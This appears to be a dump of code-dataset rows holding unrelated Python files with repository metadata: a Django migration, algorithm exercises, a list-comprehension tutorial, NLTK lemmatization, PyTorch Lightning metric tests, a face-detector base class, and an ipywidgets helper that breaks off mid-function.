blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d2a116fd1e388ccc8ebd0e3a4c78b63d1b0b2041 | cc08f8eb47ef92839ba1cc0d04a7f6be6c06bd45 | /Personal/Cmmercial/products/migrations/0001_initial.py | 3f1b13821e51314afd7b2052f0cec407866a824f | [] | no_license | ProsenjitKumar/PycharmProjects | d90d0e7c2f4adc84e861c12a3fcb9174f15cde17 | 285692394581441ce7b706afa3b7af9e995f1c55 | refs/heads/master | 2022-12-13T01:09:55.408985 | 2019-05-08T02:21:47 | 2019-05-08T02:21:47 | 181,052,978 | 1 | 1 | null | 2022-12-08T02:31:17 | 2019-04-12T17:21:59 | null | UTF-8 | Python | false | false | 1,216 | py | # Generated by Django 2.1.3 on 2018-11-21 08:30
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('image', models.ImageField(blank=True, upload_to='product_photo/')),
('description', models.TextField()),
('price', models.IntegerField()),
],
),
migrations.CreateModel(
name='ProductCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
],
),
migrations.AddField(
model_name='product',
name='category',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='products.ProductCategory'),
),
]
| [
"[email protected]"
] | |
e3554e38fb6ff22a2f5045724ea53f7595a4c7e5 | 10ddfb2d43a8ec5d47ce35dc0b8acf4fd58dea94 | /Python/number-of-unequal-triplets-in-array.py | b5c5df654ed10cc8343e709f7badcabd6c662a00 | [
"MIT"
] | permissive | kamyu104/LeetCode-Solutions | f54822059405ef4df737d2e9898b024f051fd525 | 4dc4e6642dc92f1983c13564cc0fd99917cab358 | refs/heads/master | 2023-09-02T13:48:26.830566 | 2023-08-28T10:11:12 | 2023-08-28T10:11:12 | 152,631,182 | 4,549 | 1,651 | MIT | 2023-05-31T06:10:33 | 2018-10-11T17:38:35 | C++ | UTF-8 | Python | false | false | 551 | py | # Time: O(n * k) = O(3 * n)
# Space: O(n + k) = O(n)
import collections
# freq table, dp
class Solution(object):
def unequalTriplets(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
K = 3
cnt = collections.Counter()
dp = [0]*K # dp[i]: number of unequal (i+1)-plets
for x in nums:
cnt[x] += 1
other_cnt = 1
for i in xrange(K):
dp[i] += other_cnt
other_cnt = dp[i]-cnt[x]*other_cnt
return dp[K-1]
| [
"[email protected]"
] | |
333b9acb1c421772b36728887c628c06910f5ea9 | 47deebe6fefedb01fdce5d4e82f58bb08f8e1e92 | /python core/Lesson_9/list_15.py | 3c9f1848f5a41869c089d25a9f31a5453ed7030e | [] | no_license | developeryuldashev/python-core | 5bb162603bdb5782acf05e3fb25ca5dd6347067a | 08fca77c9cfde69d93a7875b3fb65b98f3dabd78 | refs/heads/main | 2023-08-21T03:33:12.160133 | 2021-10-19T04:56:53 | 2021-10-19T04:56:53 | 393,383,696 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 128 | py | a=[1,2,3,4,5,6,3,4,5,8,9]
b=[]
c=[]
n=len(a)
i=n
while i>0:
b.append(a[i-1])
c.append(a[i-2])
i-=2
print(b)
print(c) | [
"[email protected]"
] | |
300add98b274304dbcde91ccbb0f8fb7c2bda876 | c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce | /flask/flaskenv/Lib/site-packages/pandas/tests/series/test_internals.py | 0febda9b710f4d9388ea3bf53da20bcf4f5af3c0 | [] | no_license | AhsonAslam/webapi | 54cf7466aac4685da1105f9fb84c686e38f92121 | 1b2bfa4614e7afdc57c9210b0674506ea70b20b5 | refs/heads/master | 2020-07-27T06:05:36.057953 | 2019-09-17T06:35:33 | 2019-09-17T06:35:33 | 208,895,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:cef8d1aa7b5483d0f8576d8863c0fa66a3fd81948992238d8d5f1a5531cee05a
size 8984
| [
"github@cuba12345"
] | github@cuba12345 |
14dc45b7b1ffbddfdfb9e556d2237d15b7495403 | 14d940630ab365be939fc08d3d95b0a98789bae7 | /lab32_list_comprehension_parte1.py | ab0e3c4e44cd1d99e38f7d80a38a5e3f85b41e0a | [] | no_license | accolombini/python_completo | 1da6f58f0c57b978d70582d96dc12b80c2d5b8a8 | 935102173a1112273b09734392dca08d76e9c749 | refs/heads/master | 2023-01-09T07:51:15.494101 | 2020-10-11T23:39:08 | 2020-10-11T23:39:08 | 283,790,276 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,343 | py | """
List Comprehension ->> utilizando List Comprehension nós podemos gerar novas listas com dados processados
a partir de outro iterável (uma coleção de dados)
- Sintaxe da List Comprehension
- [dado clausula for dado in itervael]
<$> Para melhor entender o que está acontecendo devemos dividir a expressão em duas partes:
- A primeira parte: for dado in iteravel
- A segunda parte: dado <-> aplica-se a operação expressa em clausula
"""
# Exemplos
numeros = [1, 2, 3, 4, 5] # Nosso iterável exemplo
print(f'Neste primeiro exemplo nossa lista-> {numeros}\nSeu tipo é -> {type(numeros)}')
# Observe o poder da list comprehension
res = [numero * 10 for numero in numeros]
print(f'Neste primeiro exemplo vamos multiplicar cada elemento da lista por 10 -> {res}\nSeu tipo é -> {type(res)}')
# Exemplos observe o poder do comprehension
res = [numero / 2 for numero in numeros]
print(f'Neste primeiro exemplo vamos dividir cada elemento da lista por 2 -> {res}\nSeu tipo é -> {type(res)}')
def funcao(valor):
"""
Função para teste do poder do comprehension
:param valor: Parâmetro a ser passado para a funcao ->> receberá os valores vindo do iterável
:return: Retorna o valor multiplicado por ele próprio
"""
return valor * valor
res = [funcao(numero) for numero in numeros]
print(f'Neste exemplo vamos trabalhar com a função teste -> {res}\nSeu tipo é -> {type(res)}')
# Avaliando diferenças =>> list Comprehension x loop
# Loop
numeros = [1, 2, 3, 4, 5]
numeros_dobrados = []
for numero in numeros:
numero_dobrado = numero * 2
numeros_dobrados.append(numero_dobrado)
print(f'Comparando List Comprehension x loop -> loop {numeros_dobrados}\nSeu tipo é {type(numeros_dobrados)}')
# Vamos refatorar o código acima para que seja menos traumático quando comparado com o uso do Comprehension
numeros_dobrados = []
for numero in [1, 2, 3, 4, 5]:
numeros_dobrados.append(numero * 2)
print(f'Comparando após refatorado List Comprehension x loop -> loop {numeros_dobrados}\nSeu tipo é {type(numeros_dobrados)}')
# O mesmo exemplo utilizndo list Comprehension ->> observe as duas formas veja a facilidade!!!
res = [numero * 2 for numero in numeros]
print(f'O mesmo exemplo com list Comprehension {res}')
print(f'O mesmo exemplo com list Comprehension {[numero * 2 for numero in numeros]}')
# Outros exemplos
# Exemplo 1 -> queremos colocar todos os caracteres em maiúscula
nome = 'Python para Ciência de Dados'
print(f'Exemplos de uso de list comprehension -> {[letra.upper() for letra in nome]}\nSeu tipo é -> {type([letra.upper() for letra in nome])}')
# Exemplo 2 -> queremos colocar apenas o primeiro caracter em maiúscula
amigos = ['joão', 'pedro', 'fernando', 'mariana', 'carlos']
print(f'Primeiro em maiúcula -> {[amigo.title() for amigo in amigos]}')
# Exemplo 3 -> trabablhando com range -> queremos multiplicar por 10 uma lista gerada por range
print(f'Trabalhando com range -> {[numero * 10 for numero in range(1, 10)]}')
# Exemplo 4 -> convertendo uma lista para boolean
print(f'Converte para Boolean -> {[bool(valor) for valor in [0, [],"", True, 1, 2, 3, 100.37]]}')
# Exemplo 5 -> transformando números em string usando cast
print(f'Tranformando números em strings -> {[str(letra) for letra in [1, 2, 3, 4, 5]]}')
| [
"[email protected]"
] | |
7af3564ec490ee7c916717f5e43254d06bac12c9 | 3c73609eea12d6784ffc0be5acc6994cda19dc57 | /Codeforces Difficulty 500-700/595AVitalyAndNight.py | c02b2a9caee1ba24e4511fe2d5b3542c6977975d | [] | no_license | TanveshT/Competitive-Programming | 0cf7a8ebc20a74cb6fd8505e67fbfec5bac6b8c2 | 47acc0a2af2711c86bb0da06e961677a8ec1e7d3 | refs/heads/master | 2022-12-19T01:44:46.033633 | 2020-09-25T06:57:23 | 2020-09-25T06:57:23 | 258,095,824 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 225 | py | n, m = map(int, input().split())
m2 = 2*m
count = 0
for i in range(n):
floor = list(map(int, input().split()))
for j in range(0,m2,2):
if floor[j] == 1 or floor[j+1] == 1:
count += 1
print(count) | [
"[email protected]"
] | |
50d52ee48c67426db276446ad0379118ac996184 | b4c2bbf32748f381f8918c2c20d2a86b5453dc87 | /plugins/extract/detect/_base.py | b737b6386a1f08673c4091bad17a567f57a21522 | [
"MIT"
] | permissive | oveis/DeepVideoFaceSwap | d45c7a18204f851a5c8b9cb6c9618284d4314b59 | e507f94d4f5d74c36e41c386c6fb14bb745a4885 | refs/heads/dev-gan-model | 2022-07-14T10:06:08.131201 | 2019-07-09T00:48:16 | 2019-07-09T00:48:16 | 184,978,011 | 6 | 5 | MIT | 2022-06-21T22:00:38 | 2019-05-05T04:09:53 | Python | UTF-8 | Python | false | false | 13,579 | py | #!/usr/bin/env python3
""" Base class for Face Detector plugins
Plugins should inherit from this class
See the override methods for which methods are
required.
For each source frame, the plugin must pass a dict to finalize containing:
{"filename": <filename of source frame>,
"image": <source image>,
"detected_faces": <list of BoundingBoxes>} (Class defined in /lib/faces_detect)
"""
import logging
import os
import traceback
from io import StringIO
import cv2
from lib.faces_detect import BoundingBox
from lib.gpu_stats import GPUStats
from lib.utils import rotate_landmarks, GetModel
from plugins.extract._config import Config
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
def get_config(plugin_name):
""" Return the config for the requested model """
return Config(plugin_name).config_dict
class Detector():
""" Detector object """
def __init__(self, loglevel,
git_model_id=None, model_filename=None, rotation=None, min_size=0):
logger.debug("Initializing %s: (loglevel: %s, git_model_id: %s, model_filename: %s, "
"rotation: %s, min_size: %s)", self.__class__.__name__, loglevel,
git_model_id, model_filename, rotation, min_size)
self.config = get_config(".".join(self.__module__.split(".")[-2:]))
self.loglevel = loglevel
self.rotation = self.get_rotation_angles(rotation)
self.min_size = min_size
self.parent_is_pool = False
self.init = None
self.error = None
# The input and output queues for the plugin.
# See lib.queue_manager.QueueManager for getting queues
self.queues = {"in": None, "out": None}
# Path to model if required
self.model_path = self.get_model(git_model_id, model_filename)
# Target image size for passing images through the detector
# Set to tuple of dimensions (x, y) or int of pixel count
self.target = None
# Approximate VRAM used for the set target. Used to calculate
# how many parallel processes / batches can be run.
# Be conservative to avoid OOM.
self.vram = None
# For detectors that support batching, this should be set to
# the calculated batch size that the amount of available VRAM
# will support. It is also used for holding the number of threads/
# processes for parallel processing plugins
self.batch_size = 1
logger.debug("Initialized _base %s", self.__class__.__name__)
# <<< OVERRIDE METHODS >>> #
def initialize(self, *args, **kwargs):
""" Inititalize the detector
Tasks to be run before any detection is performed.
Override for specific detector """
logger.debug("initialize %s (PID: %s, args: %s, kwargs: %s)",
self.__class__.__name__, os.getpid(), args, kwargs)
self.init = kwargs.get("event", False)
self.error = kwargs.get("error", False)
self.queues["in"] = kwargs["in_queue"]
self.queues["out"] = kwargs["out_queue"]
def detect_faces(self, *args, **kwargs):
""" Detect faces in rgb image
Override for specific detector
Must return a list of BoundingBox's"""
try:
if not self.init:
self.initialize(*args, **kwargs)
except ValueError as err:
logger.error(err)
exit(1)
logger.debug("Detecting Faces (args: %s, kwargs: %s)", args, kwargs)
# <<< GET MODEL >>> #
@staticmethod
def get_model(git_model_id, model_filename):
""" Check if model is available, if not, download and unzip it """
if model_filename is None:
logger.debug("No model_filename specified. Returning None")
return None
if git_model_id is None:
logger.debug("No git_model_id specified. Returning None")
return None
cache_path = os.path.join(os.path.dirname(__file__), ".cache")
model = GetModel(model_filename, cache_path, git_model_id)
return model.model_path
# <<< DETECTION WRAPPER >>> #
def run(self, *args, **kwargs):
""" Parent detect process.
This should always be called as the entry point so exceptions
are passed back to parent.
Do not override """
try:
logger.debug("Executing detector run function")
self.detect_faces(*args, **kwargs)
except Exception as err: # pylint: disable=broad-except
logger.error("Caught exception in child process: %s: %s", os.getpid(), str(err))
# Display traceback if in initialization stage
if not self.init.is_set():
logger.exception("Traceback:")
tb_buffer = StringIO()
traceback.print_exc(file=tb_buffer)
logger.trace(tb_buffer.getvalue())
exception = {"exception": (os.getpid(), tb_buffer)}
self.queues["out"].put(exception)
exit(1)
# <<< FINALIZE METHODS>>> #
def finalize(self, output):
""" This should be called as the final task of each plugin
Performs fianl processing and puts to the out queue """
if isinstance(output, dict):
logger.trace("Item out: %s", {key: val
for key, val in output.items()
if key != "image"})
if self.min_size > 0 and output.get("detected_faces", None):
output["detected_faces"] = self.filter_small_faces(output["detected_faces"])
else:
logger.trace("Item out: %s", output)
self.queues["out"].put(output)
def filter_small_faces(self, detected_faces):
""" Filter out any faces smaller than the min size threshold """
retval = list()
for face in detected_faces:
face_size = (face.width ** 2 + face.height ** 2) ** 0.5
if face_size < self.min_size:
logger.debug("Removing detected face: (face_size: %s, min_size: %s",
face_size, self.min_size)
continue
retval.append(face)
return retval
# <<< DETECTION IMAGE COMPILATION METHODS >>> #
def compile_detection_image(self, input_image,
is_square=False, scale_up=False, to_rgb=False, to_grayscale=False):
""" Compile the detection image """
image = input_image.copy()
if to_rgb:
image = image[:, :, ::-1]
elif to_grayscale:
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) # pylint: disable=no-member
scale = self.set_scale(image, is_square=is_square, scale_up=scale_up)
image = self.scale_image(image, scale)
return [image, scale]
def set_scale(self, image, is_square=False, scale_up=False):
""" Set the scale factor for incoming image """
height, width = image.shape[:2]
if is_square:
if isinstance(self.target, int):
dims = (self.target ** 0.5, self.target ** 0.5)
self.target = dims
source = max(height, width)
target = max(self.target)
else:
source = (width * height) ** 0.5
if isinstance(self.target, tuple):
self.target = self.target[0] * self.target[1]
target = self.target ** 0.5
if scale_up or target < source:
scale = target / source
else:
scale = 1.0
logger.trace("Detector scale: %s", scale)
return scale
@staticmethod
def scale_image(image, scale):
""" Scale the image """
# pylint: disable=no-member
if scale == 1.0:
return image
height, width = image.shape[:2]
interpln = cv2.INTER_LINEAR if scale > 1.0 else cv2.INTER_AREA
dims = (int(width * scale), int(height * scale))
if scale < 1.0:
logger.trace("Resizing image from %sx%s to %s.",
width, height, "x".join(str(i) for i in dims))
image = cv2.resize(image, dims, interpolation=interpln)
return image
# <<< IMAGE ROTATION METHODS >>> #
@staticmethod
def get_rotation_angles(rotation):
""" Set the rotation angles. Includes backwards compatibility for the
'on' and 'off' options:
- 'on' - increment 90 degrees
- 'off' - disable
- 0 is prepended to the list, as whatever happens, we want to
scan the image in it's upright state """
rotation_angles = [0]
if not rotation or rotation.lower() == "off":
logger.debug("Not setting rotation angles")
return rotation_angles
if rotation.lower() == "on":
rotation_angles.extend(range(90, 360, 90))
else:
passed_angles = [int(angle)
for angle in rotation.split(",")]
if len(passed_angles) == 1:
rotation_step_size = passed_angles[0]
rotation_angles.extend(range(rotation_step_size,
360,
rotation_step_size))
elif len(passed_angles) > 1:
rotation_angles.extend(passed_angles)
logger.debug("Rotation Angles: %s", rotation_angles)
return rotation_angles
def rotate_image(self, image, angle):
""" Rotate the image by given angle and return
Image with rotation matrix """
if angle == 0:
return image, None
return self.rotate_image_by_angle(image, angle)
@staticmethod
def rotate_rect(bounding_box, rotation_matrix):
""" Rotate a BoundingBox based on the rotation_matrix"""
logger.trace("Rotating BoundingBox")
bounding_box = rotate_landmarks(bounding_box, rotation_matrix)
return bounding_box
@staticmethod
def rotate_image_by_angle(image, angle,
rotated_width=None, rotated_height=None):
""" Rotate an image by a given angle.
From: https://stackoverflow.com/questions/22041699 """
logger.trace("Rotating image: (angle: %s, rotated_width: %s, rotated_height: %s)",
angle, rotated_width, rotated_height)
height, width = image.shape[:2]
image_center = (width/2, height/2)
rotation_matrix = cv2.getRotationMatrix2D( # pylint: disable=no-member
image_center, -1.*angle, 1.)
if rotated_width is None or rotated_height is None:
abs_cos = abs(rotation_matrix[0, 0])
abs_sin = abs(rotation_matrix[0, 1])
if rotated_width is None:
rotated_width = int(height*abs_sin + width*abs_cos)
if rotated_height is None:
rotated_height = int(height*abs_cos + width*abs_sin)
rotation_matrix[0, 2] += rotated_width/2 - image_center[0]
rotation_matrix[1, 2] += rotated_height/2 - image_center[1]
logger.trace("Rotated image: (rotation_matrix: %s", rotation_matrix)
return (cv2.warpAffine(image, # pylint: disable=no-member
rotation_matrix,
(rotated_width, rotated_height)),
rotation_matrix)
# << QUEUE METHODS >> #
def get_item(self):
""" Yield one item from the queue """
item = self.queues["in"].get()
if isinstance(item, dict):
logger.trace("Item in: %s", item["filename"])
else:
logger.trace("Item in: %s", item)
if item == "EOF":
logger.debug("In Queue Exhausted")
# Re-put EOF into queue for other threads
self.queues["in"].put(item)
return item
def get_batch(self):
""" Get items from the queue in batches of
self.batch_size
First item in output tuple indicates whether the
queue is exhausted.
Second item is the batch
Remember to put "EOF" to the out queue after processing
the final batch """
exhausted = False
batch = list()
for _ in range(self.batch_size):
item = self.get_item()
if item == "EOF":
exhausted = True
break
batch.append(item)
logger.trace("Returning batch size: %s", len(batch))
return (exhausted, batch)
# <<< MISC METHODS >>> #
@staticmethod
def get_vram_free():
""" Return free and total VRAM on card with most VRAM free"""
stats = GPUStats()
vram = stats.get_card_most_free()
logger.verbose("Using device %s with %sMB free of %sMB",
vram["device"],
int(vram["free"]),
int(vram["total"]))
return int(vram["card_id"]), int(vram["free"]), int(vram["total"])
@staticmethod
def set_predetected(width, height):
""" Set a BoundingBox for predetected faces """
# Predetected_face is used for sort tool.
# Landmarks should not be extracted again from predetected faces,
# because face data is lost, resulting in a large variance
# against extract from original image
logger.debug("Setting predetected face")
return [BoundingBox(0, 0, width, height)]
| [
"[email protected]"
] | |
cf11d468c235daf41b6fa67bdd4fd202349ff255 | 579ddcffa5519d0cfde6209d3c030e12b487b05f | /LeetCode_June2020/is_subsequence.py | 28c96b53d3390b07c328f9bf06bdb376456dfb6f | [] | no_license | mrshaikh4u/Problem-solving | 001e00292e531c4205b80785f617c6189ec9f2a8 | 96b257e2053eaaa75a152e92657cbf39f9169b8a | refs/heads/master | 2022-11-13T19:48:43.565431 | 2022-11-03T18:42:49 | 2022-11-03T18:42:49 | 252,262,607 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 607 | py |
class Solution:
def isSubsequence(self, s: str, t: str) -> bool:
if t is None or len(t)==0:
return s is None or len(s)==0
if s is None or len(s)==0:
return True
# s = "abc", t = "ahbgdc"
ptr = 0
for c in s:
found = False
while ptr < len(t):
if t[ptr] == c:
found = True
ptr+=1
break
ptr+=1
if found == False:
return False
return True
obj = Solution()
print(obj.isSubsequence("","abcd"))
| [
"[email protected]"
] | |
781fed99b49ba8f6c143ba1f942e9603e3a68d20 | e32a75c44ef9c964bc5f97712c8e0e845ee3f6ca | /lemmatise_question_vocab.py | 74408714d90e2917500ed5edbe53dc9a64b74ca6 | [] | no_license | ankita-kalra/ivqa_belief_set | 29c40ec4076433ac412728aea603e4e69ce530eb | 6ebba50ff001e1af6695bb3f4d2643e7072ee153 | refs/heads/master | 2020-04-05T17:17:00.834303 | 2018-08-27T09:59:16 | 2018-08-27T09:59:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,499 | py | with open('data/vqa_trainval_question_word_counts.txt', 'r') as fs:
lines = fs.readlines()
words = [line.split()[0].strip() for line in lines]
with open('tmp_dump.txt', 'w') as fs:
for word in words:
fs.write('%s\n' % word)
from nltk.corpus import wordnet as wn
import nltk
import numpy as np
def is_noun(tag):
return tag in ['NN', 'NNS', 'NNP', 'NNPS']
def is_verb(tag):
return tag in ['VB', 'VBD', 'VBG', 'VBN', 'VBP', 'VBZ']
def is_adverb(tag):
return tag in ['RB', 'RBR', 'RBS']
def is_adjective(tag):
return tag in ['JJ', 'JJR', 'JJS']
def penn_to_wn(tag):
if is_adjective(tag):
return wn.ADJ
elif is_noun(tag):
return wn.NOUN
elif is_adverb(tag):
return wn.ADV
elif is_verb(tag):
return wn.VERB
return None
# generated lemmatized words
lemmatized = []
for i, word in enumerate(words):
pos_tag = nltk.pos_tag([word])
tag = pos_tag[0][-1]
wn_type = penn_to_wn(tag)
if wn_type is None:
lem_word = word
else:
lem_word = nltk.stem.WordNetLemmatizer().lemmatize(word, wn_type)
lemmatized.append(lem_word)
# build mapping
vocab = {word: i for i, word in enumerate(words)}
index = []
for lem_word, word in zip(lemmatized, words):
try:
id = vocab[lem_word]
except:
id = vocab[word]
index.append(id)
index = np.array(index, dtype=np.int32)
from scipy.io import savemat
savemat('data/quest_token2lemma.mat', {'word2lemma': index}) | [
"[email protected]"
] | |
fad4277ce6037da4dbeb48ec277ee28b3e0372c9 | 9e1df555176bae216828c404ad7290c2eb030cbf | /tests/metrics/test_metric.py | d97cd1a176cf294208e20b3b3e4a764318141b3c | [
"Apache-2.0",
"LicenseRef-scancode-proprietary-license"
] | permissive | shijianjian/pytorch-lightning | e11be4d4926a1a0c8f605e596bec19926d476876 | b6f3cf5e52dddedec6f7b3e85c0702b75907452c | refs/heads/master | 2023-03-02T14:58:54.139540 | 2021-02-10T05:38:23 | 2021-02-10T05:38:23 | 318,134,795 | 1 | 0 | Apache-2.0 | 2020-12-03T09:05:46 | 2020-12-03T09:05:45 | null | UTF-8 | Python | false | false | 3,841 | py | import pickle
from collections import OrderedDict
from distutils.version import LooseVersion
import cloudpickle
import numpy as np
import pytest
import torch
from pytorch_lightning.metrics.metric import Metric
torch.manual_seed(42)
class Dummy(Metric):
name = "Dummy"
def __init__(self):
super().__init__()
self.add_state("x", torch.tensor(0), dist_reduce_fx=None)
def update(self):
pass
def compute(self):
pass
def test_inherit():
a = Dummy()
def test_add_state():
a = Dummy()
a.add_state("a", torch.tensor(0), "sum")
assert a._reductions["a"](torch.tensor([1, 1])) == 2
a.add_state("b", torch.tensor(0), "mean")
assert np.allclose(a._reductions["b"](torch.tensor([1.0, 2.0])).numpy(), 1.5)
a.add_state("c", torch.tensor(0), "cat")
assert a._reductions["c"]([torch.tensor([1]), torch.tensor([1])]).shape == (2,)
with pytest.raises(ValueError):
a.add_state("d1", torch.tensor(0), 'xyz')
with pytest.raises(ValueError):
a.add_state("d2", torch.tensor(0), 42)
with pytest.raises(ValueError):
a.add_state("d3", [torch.tensor(0)], 'sum')
with pytest.raises(ValueError):
a.add_state("d4", 42, 'sum')
def custom_fx(x):
return -1
a.add_state("e", torch.tensor(0), custom_fx)
assert a._reductions["e"](torch.tensor([1, 1])) == -1
def test_add_state_persistent():
a = Dummy()
a.add_state("a", torch.tensor(0), "sum", persistent=True)
assert "a" in a.state_dict()
a.add_state("b", torch.tensor(0), "sum", persistent=False)
if LooseVersion(torch.__version__) >= LooseVersion("1.6.0"):
assert "b" not in a.state_dict()
def test_reset():
class A(Dummy):
pass
a = A()
assert a.x == 0
a.x = torch.tensor(5)
a.reset()
assert a.x == 0
def test_update():
class A(Dummy):
def update(self, x):
self.x += x
a = A()
assert a.x == 0
assert a._computed is None
a.update(1)
assert a._computed is None
assert a.x == 1
a.update(2)
assert a.x == 3
assert a._computed is None
def test_compute():
class A(Dummy):
def update(self, x):
self.x += x
def compute(self):
return self.x
a = A()
assert 0 == a.compute()
assert 0 == a.x
a.update(1)
assert a._computed is None
assert a.compute() == 1
assert a._computed == 1
a.update(2)
assert a._computed is None
assert a.compute() == 2
assert a._computed == 2
# called without update, should return cached value
a._computed = 5
assert a.compute() == 5
def test_forward():
class A(Dummy):
def update(self, x):
self.x += x
def compute(self):
return self.x
a = A()
assert a(5) == 5
assert a._forward_cache == 5
assert a(8) == 8
assert a._forward_cache == 8
assert a.compute() == 13
class ToPickle(Dummy):
def update(self, x):
self.x += x
def compute(self):
return self.x
def test_pickle(tmpdir):
# doesn't tests for DDP
a = ToPickle()
a.update(1)
metric_pickled = pickle.dumps(a)
metric_loaded = pickle.loads(metric_pickled)
assert metric_loaded.compute() == 1
metric_loaded.update(5)
assert metric_loaded.compute() == 5
metric_pickled = cloudpickle.dumps(a)
metric_loaded = cloudpickle.loads(metric_pickled)
assert metric_loaded.compute() == 1
def test_state_dict(tmpdir):
""" test that metric states can be removed and added to state dict """
metric = Dummy()
assert metric.state_dict() == OrderedDict()
metric.persistent(True)
assert metric.state_dict() == OrderedDict(x=0)
metric.persistent(False)
assert metric.state_dict() == OrderedDict()
| [
"[email protected]"
] | |
4e8c3e29671d3b8ee93186ca9cb39e1dc9041ad6 | 0fbc2dff6c74d79fcdc3170c8bfb2fe8fa955175 | /notebooks/widget_org.py | 624b1b94ee375d5ac5c91a1f23818bb2cee26729 | [
"BSD-3-Clause"
] | permissive | mwcraig/tutorial | abedcaa251d63d7de4a0c17f99a7f7dd7639d086 | e1dfa624b0d043f33b768edeb35629741f4d890f | refs/heads/master | 2022-11-08T15:09:04.056005 | 2019-07-07T22:06:12 | 2019-07-07T23:04:16 | 134,425,268 | 0 | 0 | BSD-3-Clause | 2018-05-22T14:11:30 | 2018-05-22T14:11:30 | null | UTF-8 | Python | false | false | 7,088 | py | import string
import inspect
from collections import defaultdict
import ipywidgets as widgets
def extract_module_name(obj, full=False):
"""
Get the name of a module for an object.
"""
properties = inspect.getmembers(obj)
for name, value in properties:
if name == '__module__':
if full:
return value.split('.')[-1]
else:
return value
else:
raise ValueError('How odd...no moduel was found!')
def organized_widgets(organize_by='ui'):
"""
Return a dictionary of all DOM widgets organized by either which module
they are in or by the type of UI.
Parameters
----------
organize_by : str, optional
Must be one of 'ui' or 'module'. Determines the keys in the returned
dictionary.
Returns
-------
dict
Dictionary whose keys are the names of the widget groups and whose
values are dictionaries. The dictionaries which are the values of
``groups`` have the name of the widget to be displayed as
the key and the class of the widget as the value.
"""
valid_organizations = ['ui', 'module']
if organize_by not in valid_organizations:
raise ValueError(f'Invalid value {organize_by} for organize_by. '
'Valid options are: {valid_organizations}')
all_wids = inspect.getmembers(widgets)
# for a in all_wids:
# name = a[0]
# arf = a[1]
# if (not name.startswith('_') and
# name[0] in string.ascii_uppercase and
# issubclass(arf, widgets.DOMWidget)):
# print('woot')
widget_dict = {name: wid for name, wid in all_wids
if not name.startswith('_') and
name[0] in string.ascii_uppercase and
issubclass(wid, widgets.DOMWidget) and
name != 'DOMWidget'
}
if organize_by == 'ui':
containers = ['Box', 'VBox', 'HBox', 'GridBox',
'Accordion', 'Tab', 'AppLayout', 'GridspecLayout',
'TwoByTwoLayout']
groups = dict(
sliders={k: v for k, v in widget_dict.items() if 'Slider' in k},
buttons={k: v for k, v in widget_dict.items() if 'Button' in k},
containers={k: v for k, v in widget_dict.items() if k in containers},
texts={k: v for k, v in widget_dict.items() if 'text' in k or 'Text' in k or 'HTML' in k or k in ['Label', 'Password']},
progress={k: v for k, v in widget_dict.items() if 'Progress' in k},
selects={k: v for k, v in widget_dict.items() if k in ['Dropdown', 'Select', 'SelectMultiple']},
media={k: v for k, v in widget_dict.items() if k in ['Audio', 'Image', 'Play', 'Video']}
)
all_so_far = [name for k, v in groups.items() for name in v.keys()]
groups['others'] = {k: v for k, v in widget_dict.items() if k not in all_so_far}
elif organize_by == 'module':
groups = defaultdict(dict)
for k, v in widget_dict.items():
module_name = extract_module_name(v)
# Grab just the very last part of the module name for a nicer title
module_name = module_name.split('_')[-1]
groups[module_name][k] = v
return groups
def list_overview_widget(groups,
help_url_base='',
columns=3,
min_width_single_widget=300):
"""
Create an tab-based display of all of the widgets in ``groups``, with
a separate tab for each key in groups and links to more detail for each
widget. The first line of the docstring of each widget provides a
short description of the widget.
Parameters
----------
groups : dict
Dictionary whose keys are the names of the widget groups and whose
values are dictionaries. The dictionaries which are the values of
``groups`` should have the name of the widget to be displayed as
the key and the class of the widget as the value.
help_url_base : str, optional
URL to prepend to the help link for each widget.
columns : int, optional
Number of columns to use in displaying the widgets.
min_width_single_widget : int, optional
Minimum width, in pixels, of a widget displayed on a tab.
Returns
-------
widgets.Tab
A ``Tab`` widget with one tab for key of groups in which all of
the widgets in that group are displayed.
"""
tabs = widgets.Tab()
if help_url_base is None:
help_url_base = 'https://ipywidgets.readthedocs.io/en/stable/examples/Widget%20List.html'
titles = []
kids = []
def box_maker(name, widget, group):
layout = widgets.Layout(grid_template_columns="1fr",
border='2px solid gray')
b = widgets.GridBox(layout=layout)
module = extract_module_name(widget, full=True)
#print(' ', widget.__name__, module)
